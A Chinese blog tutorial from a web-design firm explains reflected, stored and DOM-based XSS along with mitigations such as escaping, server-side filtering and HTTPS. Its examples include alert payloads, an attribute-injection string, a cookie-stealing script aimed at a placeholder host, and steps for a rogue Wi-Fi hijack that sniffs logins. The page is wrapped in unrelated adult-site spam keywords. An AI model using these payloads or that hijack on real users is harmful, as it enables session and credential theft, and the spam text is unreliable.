国产馆av播放_美女国内精品自产拍在线播放 _青青精品视频播放_亚州国产精品久久久_国产原创精品视频_亚洲免费视频观看_久久久亚洲精华液精华液精华液_欧美xxx久久

億萬(wàn)聯(lián)合 — 專業(yè)網(wǎng)站建設(shè)服務(wù)商 17786980340
您的位置:首頁(yè) > 資訊 > 網(wǎng)絡(luò)學(xué)堂

網(wǎng)站安全之XSS攻擊

發(fā)布時(shí)間:2017年08月07日作者:波哥 瀏覽:11151

XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見(jiàn)的Web攻擊,其重點(diǎn)是“跨域”和“客戶端執(zhí)行”。

有人將XSS攻擊分為三種,分別是:

1. Reflected XSS(基于反射的XSS攻擊)

2. Stored XSS(基于存儲(chǔ)的XSS攻擊)

3. DOM-based or local XSS(基于DOM或本地的XSS攻擊)


Reflected XSS

基于反射的XSS攻擊,主要依靠站點(diǎn)服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊。

例子:

1. 做個(gè)假設(shè),當(dāng)亞馬遜在搜索書籍,搜不到書的時(shí)候顯示提交的名稱。

2. 在搜索框搜索內(nèi)容,填入“<script>alert('handsome boy')</script>”, 點(diǎn)擊搜索。

3. 當(dāng)前端頁(yè)面沒(méi)有對(duì)返回的數(shù)據(jù)進(jìn)行過(guò)濾,直接顯示在頁(yè)面上, 這時(shí)就會(huì)alert那個(gè)字符串出來(lái)。

4. 進(jìn)而可以構(gòu)造獲取用戶cookies的地址,通過(guò)QQ群或者垃圾郵件,來(lái)讓其他人點(diǎn)擊這個(gè)地址:

http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>

PS:這個(gè)地址當(dāng)然是沒(méi)效的,只是舉例子而已。

結(jié)論:

如果只是1、2、3步做成功,那也只是自己折騰自己而已,如果第4步能做成功,才是個(gè)像樣的XSS攻擊。

開(kāi)發(fā)安全措施:

1. 前端在顯示服務(wù)端數(shù)據(jù)時(shí)候,不僅是標(biāo)簽內(nèi)容需要過(guò)濾、轉(zhuǎn)義,就連屬性值也都可能需要。

2. 后端接收請(qǐng)求時(shí),驗(yàn)證請(qǐng)求是否為攻擊請(qǐng)求,攻擊則屏蔽。

例如:

標(biāo)簽:

<span><script>alert('handsome boy')</script></span>
轉(zhuǎn)義
<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>
屬性:

如果一個(gè)input的value屬性值是

瑯琊榜" onclick="javascript:alert('handsome boy')
就可能出現(xiàn)

<input type="text" value="瑯琊榜" onclick="javascript:alert('handsome boy')">

點(diǎn)擊input導(dǎo)致攻擊腳本被執(zhí)行,解決方式可以對(duì)script或者雙引號(hào)進(jìn)行過(guò)濾。


Stored XSS

基于存儲(chǔ)的XSS攻擊,是通過(guò)發(fā)表帶有惡意跨域腳本的帖子/文章,從而把惡意腳本存儲(chǔ)在服務(wù)器,每個(gè)訪問(wèn)該帖子/文章的人就會(huì)觸發(fā)執(zhí)行。

例子:

1. 發(fā)一篇文章,里面包含了惡意腳本

今天天氣不錯(cuò)啊!<script>alert('handsome boy')</script>
2. 后端沒(méi)有對(duì)文章進(jìn)行過(guò)濾,直接保存文章內(nèi)容到數(shù)據(jù)庫(kù)。


3. 當(dāng)其他看這篇文章的時(shí)候,包含的惡意腳本就會(huì)執(zhí)行。

PS:因?yàn)榇蟛糠治恼率潜4嬲麄€(gè)HTML內(nèi)容的,前端顯示時(shí)候也不做過(guò)濾,就極可能出現(xiàn)這種情況。

結(jié)論:

后端盡可能對(duì)提交數(shù)據(jù)做過(guò)濾,在場(chǎng)景需求而不過(guò)濾的情況下,前端就需要做些處理了。

開(kāi)發(fā)安全措施:

1. 首要是服務(wù)端要進(jìn)行過(guò)濾,因?yàn)榍岸说男r?yàn)可以被繞過(guò)。

2. 當(dāng)服務(wù)端不校驗(yàn)時(shí)候,前端要以各種方式過(guò)濾里面可能的惡意腳本,例如script標(biāo)簽,將特殊字符轉(zhuǎn)換成HTML編碼。

DOM-based or local XSS

基于DOM或本地的XSS攻擊。一般是提供一個(gè)免費(fèi)的wifi,但是提供免費(fèi)wifi的網(wǎng)關(guān)會(huì)往你訪問(wèn)的任何頁(yè)面插入一段腳本或者是直接返回一個(gè)釣魚(yú)頁(yè)面,從而植入惡意腳本。這種直接存在于頁(yè)面,無(wú)須經(jīng)過(guò)服務(wù)器返回就是基于本地的XSS攻擊。


例子1:
1. 提供一個(gè)免費(fèi)的wifi。
1. 開(kāi)啟一個(gè)特殊的DNS服務(wù),將所有域名都解析到我們的電腦上,并把Wifi的DHCP-DNS設(shè)置為我們的電腦IP。
2. 之后連上wifi的用戶打開(kāi)任何網(wǎng)站,請(qǐng)求都將被我們截取到。我們根據(jù)http頭中的host字段來(lái)轉(zhuǎn)發(fā)到真正服務(wù)器上。
3. 收到服務(wù)器返回的數(shù)據(jù)之后,我們就可以實(shí)現(xiàn)網(wǎng)頁(yè)腳本的注入,并返回給用戶。
4. 當(dāng)注入的腳本被執(zhí)行,用戶的瀏覽器將依次預(yù)加載各大網(wǎng)站的常用腳本庫(kù)。


PS:例子和圖片來(lái)自,http://www.cnblogs.com/index-html/p/wifi_hijack_3.html 不是我寫的,請(qǐng)注意!
這個(gè)其實(shí)就是wifi流量劫持,中間人可以看到用戶的每一個(gè)請(qǐng)求,可以在頁(yè)面嵌入惡意代碼,使用惡意代碼獲取用戶的信息,可以返回釣魚(yú)頁(yè)面。



例子2:
1. 還是提供一個(gè)免費(fèi)wifi
2. 在我們電腦上進(jìn)行抓包
3. 分析數(shù)據(jù),可以獲取用戶的微信朋友圈、郵箱、社交網(wǎng)站帳號(hào)數(shù)據(jù)(HTTP)等。


PS:這個(gè)是我的測(cè)試,在51job頁(yè)面登錄時(shí)進(jìn)行抓包,可以獲取帳號(hào)密碼。



結(jié)論:
這攻擊其實(shí)跟網(wǎng)站本身沒(méi)有什么關(guān)系,只是數(shù)據(jù)被中間人獲取了而已,而由于HTTP是明文傳輸?shù)模允菢O可能被竊取的。


開(kāi)發(fā)安全措施:
1. 使用HTTPS!就跟我前面《HTTP與HTTPS握手的那些事》這篇文章說(shuō)的,HTTPS會(huì)在請(qǐng)求數(shù)據(jù)之前進(jìn)行一次握手,使得客戶端與服務(wù)端都有一個(gè)私鑰,服務(wù)端用這個(gè)私鑰加密,客戶端用這個(gè)私鑰解密,這樣即使數(shù)據(jù)被人截取了,也是加密后的數(shù)據(jù)。

總結(jié)

XSS攻擊的特點(diǎn)就是:盡一切辦法在目標(biāo)網(wǎng)站上執(zhí)行非目標(biāo)網(wǎng)站上原有的腳本(某篇文章說(shuō)的)。本地的XSS攻擊的示例2其實(shí)不算XSS攻擊,只是簡(jiǎn)單流量劫持。前兩種XSS攻擊是我們開(kāi)發(fā)時(shí)候要注意的,而流量劫持的則可以使用HTTPS提高安全性。

870
分類:

您還沒(méi)有登錄,請(qǐng)先登錄

4008-4008-80

027-87827780

請(qǐng)點(diǎn)擊QQ圖標(biāo)咨詢客服;為避免丟失消息,請(qǐng)?zhí)砑観Q好友
提交需求
男男视频亚洲欧美| 国产成人精品视频| 免费的黄网站在线观看| 久久精品日韩精品| 亚洲国产天堂| 欧美国产二区| 国产精品伊人| 国产91久久婷婷一区二区| 超碰免费在线观看| 亚洲精品xxxx| 国产羞羞视频在线观看| 国产精品人人做人人爽人人添| 30一40一50老女人毛片| 久久99日本精品| 好吊操这里只有精品| 久99久精品视频免费观看| 美女黄色片视频| 久久狠狠一本精品综合网| 国产精品黄页免费高清在线观看| bdsm精品捆绑chinese女| 45www国产精品网站| 免费污视频在线一区| 天堂av.com| 成人av网站免费| 又色又爽又黄无遮挡的免费视频| 成人免费黄色在线| 中文在线一区二区三区| 男人的天堂亚洲| 黄色一级片在线| 国产精品久久影院| 少妇久久久久久被弄高潮| 蜜臀av性久久久久蜜臀av麻豆| 无码人妻一区二区三区线| 亚洲欧洲xxxx| 在线视频网站| 91高潮在线观看| 国精产品一区一区三区四川| 在线观看视频污| 日韩av资源在线播放| 美女免费久久| 中国丰满人妻videoshd| 亚洲黄色av一区| 五月婷婷视频在线观看| 亚洲av永久无码精品| 午夜av一区二区| 亚洲成人看片| 国产伦精品一区二区三区精品| 极品少妇xxxx精品少妇| 久久人人爽人人爽人人| 在线亚洲人成电影网站色www| 精品麻豆国产| 欧美综合在线观看| 亚洲综合图片| 欧美高清性猛交| 91禁在线看| 欧美videossex极品| 国产精品1区在线| 中文字幕三级电影| 91国偷自产一区二区开放时间 | 羞羞视频免费| 国产91精品入口17c| av色综合久久天堂av综合| 老女人性淫交视频| 国产精品国产三级欧美二区 | 91猫先生在线| 高清成人在线观看| a毛片在线免费观看| 91禁国产网站| 蜜桃精品视频| 国产无人区码熟妇毛片多| 亚洲高清免费在线| 99久免费精品视频在线观78| 国产精品丝袜一区二区三区| 久久99热99| jyzzz在线观看视频| 97netav| 亚洲ab电影| 一区二区三区精品国产| 亚洲精品一区二区妖精| 国产精品v欧美精品v日韩精品| 在线播放亚洲| 小黄文在线观看| av漫画在线观看| 国产精品视频永久免费播放| 国产精品区一区二区三| 男人的天堂免费在线视频| 国产 高清 精品 在线 a| 免费视频一区| 精品黑人一区二区三区在线观看| 国产馆精品极品| xxxx黑人da| 日韩极品视频在线观看| 国产成人自拍高清视频在线免费播放| www.com欧美| 欧美一级黄色网| 国产精品理论在线观看| 欧美激情不卡| 国产一区二区视频免费观看| 久久人人九九| 亚洲日本中文字幕区| 国产高清av在线| 好吊色这里只有精品| 天天影视涩香欲综合网| 中文不卡1区2区3区| 欧美少妇bbw| 一卡二卡三卡四卡| 青娱乐一区二区| 韩剧1988免费观看全集| 欧美日韩中文在线| 性xx色xx综合久久久xx| 国产中文在线观看| 中文字幕av免费在线观看| 色偷偷88888欧美精品久久久| 欧美久久精品| juy有坂深雪中文字幕| 国产精品午夜av在线| 欧美日韩一区二区三区高清 | 在线视频国产一区| 精品72久久久久中文字幕| 精品久久久久一区二区三区| 中文字幕在线观看第二页| 99久久99久久| 在线综合亚洲欧美在线视频| 99在线精品免费视频九九视| 日韩美女在线看| 久久久久久久高潮| 国产在线导航| 国产亚洲精品女人久久久久久| 在线成人性视频| 国产精品aaa| 精品国产髙清在线看国产毛片| 一区二区三区四区视频精品免费| 亚洲国产日韩欧美一区二区三区| 免费一级欧美在线观看视频| 狠狠激情五月综合婷婷俺| 久久九九亚洲综合| 久久久久久免费| 在线男人天堂| www.91| 亚洲一级黄色录像| 日韩欧美在线电影| 亚洲男人天堂2023| 国产精品久久久久蜜臀| 国产无遮挡又黄又爽免费网站| 国产精品无码午夜福利| 爱福利视频一区二区| 国产精品久久9| 亚洲不卡一区二区三区| 国产99久久| 亚洲电影视频在线| 欧美成人3dxxxx| 日韩av在线免费| 亚洲天堂中文字幕| 国自产拍偷拍福利精品免费一| av在线免费观看网站| 一个人免费播放在线视频看片| 亚洲精品国产91| 九九久久久久久| 一级全黄肉体裸体全过程| 亚洲欧美日韩高清| 久久蜜桃一区二区| caoporn成人| 麻豆视频网站在线观看| 一二三四社区在线视频6| www.91视频| 国产视频xxx| 国产精品成人aaaaa网站| 91成人在线观看喷潮| 欧美aaaaaa午夜精品| 亚洲宅男一区| 国产资源在线观看入口av| 久久精品最新免费国产成人| 欧美日韩中文字幕在线观看| 久热精品在线观看视频| 亚洲va久久久噜噜噜| 日韩一区二区三区视频在线| 99精品99| 97在线观看免费观看高清| 亚洲综合激情另类专区老铁性| 亚洲观看黄色网| 国产在线精品二区| 亚洲色图都市小说| 亚洲欧美一级二级三级| 黄色精品视频| 中文字幕乱码在线播放| 成人黄视频在线观看| 三年片免费观看大全| 国色天香一二三期区别大象| 成年人网站免费在线观看 | 色偷偷亚洲女人天堂观看欧| 激情综合丝袜美女一区二区| 区日韩二区欧美三区| 久久国产视频精品| 国产精品 欧美激情| 日本黄色特级片| 污污动漫在线观看| xxxx在线免费观看| jizzzz日本| 欧美一级片一区| 日韩在线观看免费全集电视剧网站|